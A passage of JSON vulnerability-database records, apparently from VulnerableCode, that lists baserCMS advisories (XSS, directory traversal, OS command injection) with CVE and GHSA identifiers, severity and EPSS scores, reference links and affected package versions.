`UploaderFilesController.php`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15159","reference_id":"","reference_type":"","scores":[{"value":"0.01563","scoring_system":"epss","scoring_elements":"0.8186","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01563","scoring_system":"epss","scoring_elements":"0.81826","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15159"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15159","reference_id":"CVE-2020-15159","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15159"},{"reference_url":"https://github.com/advisories/GHSA-673x-f5wx-fxpw","reference_id":"GHSA-673x-f5wx-fxpw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-673x-f5wx-fxpw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}],"aliases":["CVE-2020-15159","GHSA-673x-f5wx-fxpw"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p6nr-eu91-53b4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46312?format=json","vulnerability_id":"VCID-pd8c-9d7z-zkhg","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43647","reference_id":"","reference_type":"","scores":[{"value":"0.00572","scoring_system":"epss","scoring_elements":"0.69062","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43647"},{"reference_url":"https://basercms.net/security/JVN_24381990","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://basercms.net/security/JVN_24381990"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43647","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43647"},{"reference_url":"https://github.com/advisories/GHSA-ggj4-78rm-6xgv","reference_id":"GHSA-ggj4-78rm-6xgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-ggj4-78rm-6xgv"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv","reference_id":"GHSA-ggj4-78rm-6xgv","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43647","GHSA-ggj4-78rm-6xgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=json","vulnerability_id":"VCID-sqr4-v889-tff8","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in Blog posts and Contents list Feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46994","reference_id":"","reference_type":"","scores":[{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79112","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46994"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46994","reference_id":"CVE-2024-46994","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46994"},{"reference_url":"https://github.com/advisories/GHSA-wrjc-fmfq-w3jr","reference_id":"GHSA-wrjc-fmfq-w3jr","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wrjc-fmfq-w3jr"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr","reference_id":"GHSA-wrjc-fmfq-w3jr","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46994","GHSA-wrjc-fmfq-w3jr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53745?format=json","vulnerability_id":"VCID-twf5-bzba-gqb4","summary":"Cross-site Scripting\nbaserCMS is vulnerable to Cross-Site Scripting. The issue affects the following components; Edit feed settings, Edit widget area, Sub site new registration, and New category registration. Arbitrary JavaScript may be executed by entering specific characters in the account that can access the file upload function category list, sub-site setting list, widget area edit, and feed list on the management screen.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15273","reference_id":"","reference_type":"","scores":[{"value":"0.00414","scoring_system":"epss","scoring_elements":"0.61981","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00414","scoring_system":"epss","scoring_elements":"0.61932","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15273"},{"reference_url":"https://github.com/baserproject/basercms/commit/b70474ef9dcee6ad8826360884625dc7ca9041a1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/b70474ef9dcee6ad8826360884625dc7ca9041a1"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wpww-4jf4-4hx8","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wpww-4jf4-4hx8"},{"reference_url":"https://packagist.org/packages/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packagist.org/packages/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15273","reference_id":"CVE-2020-15273","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15273"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15273","GHSA-wpww-4jf4-4hx8"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twf5-bzba-gqb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46308?format=json","vulnerability_id":"VCID-u16w-rbuk-ybfs","summary":"baserCMS Directory Traversal vulnerability in Form submission data management Feature\nThere is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.8 and earlier versions\n\n### Vulnerability\nThere is a possibility that information on the server may be obtained by a user who is logged in to the management screen.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_45547161\n\n### Credits\nShiga Takuma@BroadBand Security, Inc","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43648","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.52624","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43648"},{"reference_url":"https://basercms.net/security/JVN_81174674","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https://basercms.net/security/JVN_81174674"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43648","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43648"},{"reference_url":"https://github.com/advisories/GHSA-hmqj-gv2m-hq55","reference_id":"GHSA-hmqj-gv2m-hq55","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-hmqj-gv2m-hq55"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55","reference_id":"GHSA-hmqj-gv2m-hq55","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43648","GHSA-hmqj-gv2m-hq55"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47096?format=json","vulnerability_id":"VCID-uedz-j2vn-cbea","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-51450","reference_id":"","reference_type":"","scores":[{"value":"0.00755","scoring_system":"epss","scoring_elements":"0.73646","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-51450"},{"reference_url":"https://basercms.net/security/JVN_09767360","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://basercms.net/security/JVN_09767360"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51450","reference_id":"CVE-2023-51450","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51450"},{"reference_url":"https://github.com/advisories/GHSA-77fc-4cv5-hmfr","reference_id":"GHSA-77fc-4cv5-hmfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77fc-4cv5-hmfr"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr","reference_id":"GHSA-77fc-4cv5-hmfr","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_v